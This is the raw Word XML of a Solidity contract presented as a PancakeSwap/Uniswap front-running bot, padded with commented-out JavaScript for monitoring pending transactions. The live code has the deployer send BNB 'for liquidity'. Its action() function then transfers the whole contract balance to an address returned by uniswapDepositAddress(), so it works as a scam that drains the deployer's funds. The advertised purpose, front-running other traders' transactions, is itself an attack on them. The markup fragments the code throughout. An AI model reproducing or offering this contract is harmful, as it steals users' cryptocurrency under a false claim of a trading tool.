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26E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pragma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solidity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^</w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54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0.6.6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5E8DD50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0231FDE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PancakeSwap FrontrunDeployer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5769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import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"https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Callee.sol"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4803F84B" w14:textId="77777777" w:rsidR="00740A54" w:rsidRPr="00740A54" w:rsidRDefault="00740A54" w:rsidP="00740A54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5B5939E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PancakeSwap manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E1E0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import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"https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol"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7DA3536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import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"https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol"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7DC3743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4E4EBEC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contract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UniswapV2FrontBot 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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA56F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47E7778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string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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>public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tokenName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15E0830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string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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>public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tokenSymbol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610F845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uint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frontrun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2B553E3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uint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manager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0041D0A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77EE615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0F1A570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F38ABB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>constructor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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54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string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9E7E08"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>memory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_tokenName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,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string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9E7E08"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>memory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_tokenSymbol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)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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>public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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00895D6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tokenName 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=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_tokenName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30D19C5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tokenSymbol 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=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_tokenSymbol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7467F14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manager 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=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frontrun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52A0FCB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050AC8C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C52FC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6CC74CB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34D8189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Send required BNB for liquidity pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61347DE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F38ABB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>receive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()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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>external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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>payable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{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CFA67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7A330ED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13CDD4A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Perform tasks (clubbed .json functions into one to reduce external calls &amp; reduce gas) manager.performTasks();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63F67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47F401D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function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action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()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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>public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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>payable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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F836B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2B5772C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//Perform a front-running attack on uniswap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DC136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19E0B2E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//const fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3C1E0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Web3 = require('web3');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958279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abiDecoder = require('abi-decoder');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F499A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colors = require("colors");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7CA4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Tx = require('ethereumjs-tx').Transaction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6DBA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lastRenderedPageBreak/>
        <w:t>//var axios = require('axios');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B49C4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BigNumber = require('big-number');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DC6C7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433A0A3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//const {NETWORK, PANCAKE_ROUTER_ADDRESS, PANCAKE_FACTORY_ADDRESS, PANCAKE_ROUTER_ABI, PANCAKE_FACTORY_ABI, PANCAKE_POOL_ABI, HTTP_PROVIDER_LINK, WEBSOCKET_PROVIDER_LINK, HTTP_PROVIDER_LINK_TEST} = require('./constants.js');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A7AD6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//const {setBotAddress, getBotAddress, FRONT_BOT_ADDRESS, botABI} = require('./bot.js');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB47A8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//const {PRIVATE_KEY, TOKEN_ADDRESS, AMOUNT, LEVEL} = require('./env.js');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD374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30CF6FE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//const INPUT_TOKEN_ADDRESS = '0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210485C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//const WBNB_TOKEN_ADDRESS = '0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458BDD4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manager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21B403E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120636A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input_token_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B123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out_token_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA76DC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pool_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B26E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gas_price_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71818F2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manager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125D3CB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1DEEC37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web3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCEAD8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web3Ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E3544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web3Ws;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162511F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pancakeRouter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F196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pancakeFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE7B1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manager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5BF589D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75B6889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one gwei</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A340F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//const ONE_GWEI = 1e9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFB5B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manager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3FEB2F0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3C7821F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buy_finished = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BCF02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sell_finished = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656E58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buy_failed = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB1786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sell_failed = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59654FB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attack_started = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF740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manager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4C02D68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23ECFCC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succeed = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A9D17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subscription;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6333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manager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2A770B5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33FBAE8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//async function createWeb3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596420C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//try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B408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web3 = new Web3(new Web3.providers.HttpProvider(HTTP_PROVIDER_LINK));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8202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lastRenderedPageBreak/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web3 = new Web3(new Web3.providers.HttpProvider(HTTP_PROVIDER_LINK_TEST));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6B4E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web3 = new Web3(EthereumTesterProvider());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76873DC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web3.eth.getAccounts(console.log);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5949F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//web3Ws = new Web3(new Web3.providers.WebsocketProvider(WEBSOCKET_PROVIDER_LINK));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25785B5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//pancakeRouter = new web3.eth.Contract(PANCAKE_ROUTER_ABI, PANCAKE_ROUTER_ADDRESS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15549F5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//pancakeFactory = new web3.eth.Contract(PANCAKE_FACTORY_ABI, PANCAKE_FACTORY_ADDRESS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72008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//abiDecoder.addABI(PANCAKE_ROUTER_ABI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A59A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 manager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009D96F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//return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B51F8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//} catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788494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//console.log(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270F58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//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288EF4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F399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4C618A2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//async function main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD156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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A6B6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 xml:space="preserve">//try {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5267329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 (await createWeb3() == false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0CEBC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//console.log('Web3 Create Error'.yellow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BEF79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//process.exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172DD0E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</w:p>
    <w:p w14:paraId="53B2D3A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</w:p>
    <w:p w14:paraId="0E6E82F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40A1FFC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21DEB09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//const user_wallet = web3.eth.accounts.privateKeyToAccount(PRIVATE_KEY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A54C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//const out_token_address = TOKEN_ADDRESS;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E02EC5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//const amount = AMOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130EF3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//const level = LEVEL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D55DA4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31A3088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//ret = await preparedAttack(INPUT_TOKEN_ADDRESS, out_token_address, user_wallet, amount, level);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B8BE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//if(ret == false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4283A4E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//process.exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59959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3ACCCF1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5E31B49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//await updatePoolInfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EAF6A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//outputtoken = await pancakeRouter.methods.getAmountOut(((amount*1.2)*(10**18)).toString(), pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804412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3645282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lastRenderedPageBreak/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//await approve(gas_price_info.high, outputtoken, out_token_address, user_wallet);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16221A9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3563C69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//log_str = '***** Tracking more ' + (pool_info.attack_volumn/(10**input_token_info.decimals)).toFixed(5) + ' ' +  input_token_info.symbol + '  Exchange on Pancake *****'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6424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console.log(log_str.green);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8A8A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console.log(web3Ws);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BF8B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//web3Ws.onopen = function(evt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA19F0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//web3Ws.send(JSON.stringify({ method: "subscribe", topic: "transfers", address: user_wallet.address }));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5FD1B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//console.log('connected')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD86F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432E923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get pending transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CABE01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//subscription = web3Ws.eth.subscribe('pendingTransactions', function (error, result) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1586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//}).on("data", async function (transactionHash) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6862B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//console.log(transactionHash);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA012B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26FC046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let transaction = await web3.eth.getTransaction(transactionHash);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4297A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if (transaction != null &amp;&amp; transaction['to'] == PANCAKE_ROUTER_ADDRESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC185A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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11319EF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    await handleTransaction(transaction, out_token_address, user_wallet, amount, level);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACBCF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D9B83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</w:p>
    <w:p w14:paraId="537C7B6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 (succeed) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996260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//console.log("The bot finished the attack.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403CF88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//process.exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17897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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68028BE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</w:p>
    <w:p w14:paraId="44BEE55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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70A65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7EAB891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//catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6230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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076977F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//if(error.data != null &amp;&amp; error.data.see === 'https://infura.io/dashboard')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C04B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDACF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  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//console.log('Daily request count exceeded, Request rate limited'.yellow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2048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  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//console.log('Please insert other API Key');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95A09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//else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E950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  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//console.log('Unknown Handled Error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E6FA2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  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//console.log(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1217FCF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lastRenderedPageBreak/>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F81A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2E2E47F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//process.exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C06E8" w14:textId="77777777" w:rsidR="00740A54" w:rsidRPr="00740A54" w:rsidRDefault="00740A54" w:rsidP="00740A54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56F1B7E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//function handleTransaction(transaction, out_token_address, user_wallet, amount, level) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122875D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353E05B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//(await triggersFrontRun(transaction, out_token_address, amount, level)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276ED97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//subscription.unsubscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6299476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//console.log('Perform front running attack...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5420F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0F817D9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//gasPrice = parseInt(transaction['gasPrice']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BB1BB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//newGasPrice = gasPrice + 50*ONE_GWEI;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622EE8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2524BF8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//estimatedInput = ((amount*0.999)*(10**18)).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD470C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//realInput = (amount*(10**18)).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6D71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//gasLimit = (300000).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA53BB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46F05FC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//await updatePoolInfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96303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32C4F4F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outputtoken = await pancakeRouter.methods.getAmountOut(estimatedInput, pool_info.input_volumn.toString(), pool_info.output_volumn.toString()).call();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F7788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//swap(newGasPrice, gasLimit, outputtoken, realInput, 0, out_token_address, user_wallet, transaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7E57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6D8A6A2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//console.log("wait until the honest transaction is done...", transaction['hash']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72166FC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61CAB51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//while (await isPending(transaction['hash'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38928CE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69332C7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6B3DA8D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//if(buy_failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782671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20B9BF4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//succeed = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC3CD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//return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7F95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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54B57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0BC2D86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//console.log('Buy succeed:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF3803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34899CD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//Sell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E51963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//await updatePoolInfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC1D0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outputeth = await pancakeRouter.methods.getAmountOut(outputtoken, pool_info.output_volumn.toString(), pool_info.input_volumn.toString()).call();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2BB6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lastRenderedPageBreak/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//outputeth = outputeth * 0.999;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D710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61B531E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//await swap(newGasPrice, gasLimit, outputtoken, outputeth, 1, out_token_address, user_wallet, transaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48D63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284DFD2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//console.log('Sell succeed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4A10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//succeed = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD31CD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manager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7705D83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3643AE3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//async function approve(gasPrice, outputtoken, out_token_address, user_wallet){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F225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allowance = await out_token_info.token_contract.methods.allowance(user_wallet.address, PANCAKE_ROUTER_ADDRESS).call();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71560DF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0D62C82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//allowance = BigNumber(allowance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A61B2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//outputtoken = BigNumber(outputtoken);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D42F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06B00C9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decimals = BigNumber(10).power(out_token_info.decimals);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADF387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max_allowance = BigNumber(10000).multiply(decimals);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50854D7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24F9EF8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//if(outputtoken.gt(max_allowance))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2367D0D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C368B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//console.log('replace max allowance')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394756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//max_allowance = outputtoken;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168596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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B1A6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</w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>payable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(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uniswapDepositAddress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()).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transfer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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54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address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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="086CB5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>this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).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balance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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571255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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2ED8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3B4F030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//if(outputtoken.gt(allowance)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133D2B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//console.log(max_allowance.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28D3D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approveTX ={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65547D0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//from: user_wallet.address,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D7B2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//to: out_token_address,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3879E8B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//gas: 50000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E2CB1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//gasPrice: gasPrice*ONE_GWEI,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12970EA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//data: out_token_info.token_contract.methods.approve(PANCAKE_ROUTER_ADDRESS, max_allowance).encodeABI()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AAEF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         manager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</w:p>
    <w:p w14:paraId="42B7AC8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</w:p>
    <w:p w14:paraId="1B6171C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0455EF5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signedTX = await user_wallet.signTransaction(approveTX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC1B4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result = await web3.eth.sendSignedTransaction(signedTX.rawTransaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0440170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29BFB73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lastRenderedPageBreak/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//console.log('Approved Token')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE48CC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6CF87E6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//return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14175C9E" w14:textId="77777777" w:rsidR="00740A54" w:rsidRPr="00740A54" w:rsidRDefault="00740A54" w:rsidP="00740A54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5F48C94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//select attacking transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E854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//async function triggersFrontRun(transaction, out_token_address, amount, level) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732AEDF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50F9323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//if(attack_started)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03094FD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//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174994E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7CE102B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//console.log((transaction.hash).yellow, parseInt(transaction['gasPrice']) / 10**9);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31C67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//if(parseInt(transaction['gasPrice']) / 10**9 &gt; 10 &amp;&amp; parseInt(transaction['gasPrice']) / 10**9 &lt; 50){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397FF6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//attack_started = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492CE38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//return true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21DA8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA66F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72DD8C8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//return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38647BE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01F2C9C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 (transaction['to'] != PANCAKE_ROUTER_ADDRESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3498B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//console.log(transactionHash);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4474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20BF5D9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let transaction = await web3.eth.getTransaction(transactionHash);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68771C4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if (transaction != null &amp;&amp; transaction['to'] == PANCAKE_ROUTER_ADDRESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85FF7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA5EF8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                </w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54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function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uniswapDepositAddress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()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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>public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32BA89"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>pure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219451"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>returns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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00740A54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address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)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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3584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    await handleTransaction(transaction, out_token_address, user_wallet, amount, level);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE58D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63CB2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</w:p>
    <w:p w14:paraId="5B76AD0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 (succeed) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D9C9E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//console.log("The bot finished the attack.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2823784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//process.exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C977F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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130CC9A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</w:p>
    <w:p w14:paraId="6C9FD94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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5ECCE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0EE6E98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//catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9970F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890029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lastRenderedPageBreak/>
        <w:t xml:space="preserve">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//if(error.data != null &amp;&amp; error.data.see === 'https://infura.io/dashboard')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0E1B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F97B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  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//console.log('Daily request count exceeded, Request rate limited'.yellow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C6C2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  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//console.log('Please insert other API Key');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1EB74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//else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169790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  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//console.log('Unknown Handled Error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654ECC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  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//console.log(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BF24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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A1D7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3828C38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//process.exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE30551" w14:textId="77777777" w:rsidR="00740A54" w:rsidRPr="00740A54" w:rsidRDefault="00740A54" w:rsidP="00740A54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364FA90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//function handleTransaction(transaction, out_token_address, user_wallet, amount, level) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291438A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07CE209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//(await triggersFrontRun(transaction, out_token_address, amount, level)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5AE2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//subscription.unsubscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6F1D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//console.log('Perform front running attack...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867F57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3740603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//gasPrice = parseInt(transaction['gasPrice']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB73E1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//newGasPrice = gasPrice + 50*ONE_GWEI;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5258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2F0EC3C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//estimatedInput = ((amount*0.999)*(10**18)).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A7C3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//realInput = (amount*(10**18)).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB532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//gasLimit = (300000).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1892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3AE6BD4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//await updatePoolInfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F779F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7110107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105577F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//swap(newGasPrice, gasLimit, outputtoken, realInput, 0, out_token_address, user_wallet, transaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8B9A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302794A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//console.log("wait until the honest transaction is done...", transaction['hash']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797EF26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16275A6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//while (await isPending(transaction['hash'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3DF6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3B5D94C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1020AE8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//if(buy_failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D3E83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6C7FDC1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//succeed = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B705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//return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D80A6F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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92663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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A691AD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//console.log('Buy succeed:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D37542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2EA3BF1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//Sell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6E9A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//await updatePoolInfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679DFDF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outputeth = await pancakeRouter.methods.getAmountOut(outputtoken, pool_info.output_volumn.toString(), pool_info.input_volumn.toString()).call();</w:t>
      </w:r>
    </w:p>
